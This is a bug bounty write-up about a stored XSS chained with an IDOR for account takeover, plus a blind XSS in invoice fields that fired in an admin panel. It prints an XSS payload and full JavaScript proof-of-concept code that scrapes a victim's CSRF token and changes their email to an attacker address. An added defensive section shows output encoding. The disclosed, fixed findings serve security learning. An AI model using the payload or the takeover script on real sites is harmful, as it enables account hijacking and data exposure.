Account Takeover and Blind XSS! Go Pro, get Bugs!

May 30, 2018
Tabahi

hi all,

I’m writing my first bug bounty post; it is about some bugs I found in a private program on HackerOne.

In this program, after hunting some bugs in the application, I bought the PRO features to get more attack surface. I found some more bugs there, two of which had a huge impact.

Account Takeover

I first found an IDOR, which allowed me to create an element x in every user’s account. After reporting the issue, I told Bull about my bug, and he suggested I inject some JavaScript in there. I went back and injected a '%22%3E%3Cimg+src%3Dx+onerror%3Dalert(document.cookie)%3E payload in a text field of element x, and an alert popped up.

Now I could store XSS in every user’s account through the IDOR. There was no CSP blocking external scripts, so I could write a small script that would steal a victim’s CSRF token and then change their email ID or invite me as an Admin, taking over their account.

Through the IDOR, the JavaScript could be stored in every account remotely, and as it executed in each victim’s browser it would take over all of those accounts. I updated the report, told them about the XSS and the impact of the two bugs chained together.

I gave them the following JavaScript code as a PoC:

function stealEmailToken()
{
    var fetchHash = new XMLHttpRequest();

    var url = "https://--domain--/--path--/personal/update_email.html";
    var datax;
    var all_elements;
    var vc_email_token = 'initial';

    fetchHash.onreadystatechange = function ()
    {
        if (fetchHash.readyState == 4 && fetchHash.status == 200)
        {
            // Parse the fetched page and read the email-change token from its input fields
            datax = fetchHash.responseText;
            var loot = document.createElement('html');
            loot.innerHTML = datax;
            all_elements = loot.getElementsByTagName('input');
            vc_email_token = all_elements[2].value;
            alert('Stole your Email change Token: ' + vc_email_token + ' ...Tabahi');
            //hack(vc_email_token);
        }
    }

    // Fetch the page in the victim's session, so their cookies are sent
    fetchHash.open("GET", url, true);
    fetchHash.withCredentials = true;
    fetchHash.send();
}

stealEmailToken();

function hack(emailToken)
{
    var HackAccount = new XMLHttpRequest();

    var url = "https://--domain--/--path--/personal/update_email.html";

    HackAccount.open("POST", url, true);
    HackAccount.withCredentials = true;

    var data = 'AccountEmailForm%5BsEmail%5D%5Bfirst%5D=attacker%40attacker.com&AccountEmailForm%5BsEmail%5D%5Bsecond%5D=attacker%40attacker.com&AccountEmailForm%5B_token%5D=' + emailToken;

    HackAccount.setRequestHeader('X-Requested-With', 'XMLHttpRequest');
    HackAccount.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
    HackAccount.send(data);
}

The above script reads the victim’s CSRF token from the input elements of the ...personal/update_email.html page; the hack() function then sends a POST request with the stolen token to change the victim’s email ID.

The team fixed the bug in a few days and awarded a bounty of $3500.

The Blind XSS

When I went to purchase the PRO features of the application, there were two payment methods: credit card and bank transfer. With the bank transfer method, an invoice was generated and emailed to the user, built from input fields (name, address, etc.) supplied by the user at the time of billing.

So here I tried to inject some HTML elements, to see if the server would execute script while generating the .pdf invoice. Nothing happened.

I had also included a blind XSS payload in the elements I injected.

After a few days, while casually browsing my XSSHunter account, I saw a payload had triggered on this program’s Admin Panel. Wow!

Besides being rendered into the .pdf, the invoice was also listed unsanitized in the program’s Admin panel. The screenshot XSS Hunter captured of that page showed around a thousand of their customer invoice records, now exposed to me.

Below pic shows XSS triggered in the name and address field:


I reported the bug to the team.

It was fixed in a few days, bounty awarded was $3500.
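Both bugs above come down to the same root cause: customer-supplied text (the text field of element x, the invoice name and address) was written into a page as live markup. The following is an added example, not code from the original post or from the program, showing the server-side fix a defender would apply: contextual output encoding before the string is interpolated into HTML, plus a simple check the billing endpoint could use to log suspicious submissions. The function names and invoice shape are assumptions for illustration.

```javascript
// Added example (not from the original post). Encode customer-controlled strings
// before they are placed in HTML, and flag submissions that look like markup.

const ENTITY_MAP = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };

// Encode the five characters that let text break out of an HTML text node or a
// double-quoted attribute value.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => ENTITY_MAP[ch]);
}

// One admin-panel invoice row (hypothetical template). The markup is fixed; every
// field taken from the customer goes through escapeHtml before interpolation.
function renderInvoiceRow(invoice) {
  return '<tr><td>' + escapeHtml(invoice.name) + '</td><td>' +
         escapeHtml(invoice.address) + '</td></tr>';
}

// True if, after the template's own <tr>/<td> tags are removed, any angle bracket
// survived, i.e. a customer-supplied string produced live markup.
function rowLeaksMarkup(html) {
  return /[<>]/.test(html.replace(/<\/?t[rd]>/g, ''));
}

// Flag values that look like tags or inline event handlers so the billing endpoint
// can log them for review. This is monitoring only; escaping is the actual fix.
function looksLikeMarkupInjection(value) {
  return /<\s*\/?[a-z]/i.test(value) || /\bon[a-z]+\s*=/i.test(value);
}

// The payload from the post, decoded the way a form-encoded body is decoded
// ('+' is a space). Constructed sample input.
const POST_PAYLOAD = decodeURIComponent(
  '%22%3E%3Cimg+src%3Dx+onerror%3Dalert(document.cookie)%3E'.replace(/\+/g, ' ')
);

// Constructed sample invoice: the name carries the payload, the address carries
// ordinary characters that still need encoding.
const sampleInvoice = { name: POST_PAYLOAD, address: 'Bob & Co <Ltd>' };
const row = renderInvoiceRow(sampleInvoice);
console.log(row);
console.log('row leaks markup:', rowLeaksMarkup(row));
console.log('flag name field:', looksLikeMarkupInjection(sampleInvoice.name));
```

Run it to see the payload come out as `&quot;&gt;&lt;img src=x onerror=...&gt;`, which the browser displays as text; the same encoding applied to the element x field would have stopped the account takeover chain at its first step.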


Got something to say? Tweet me @tabahi_90

Thanks for reading 🙂
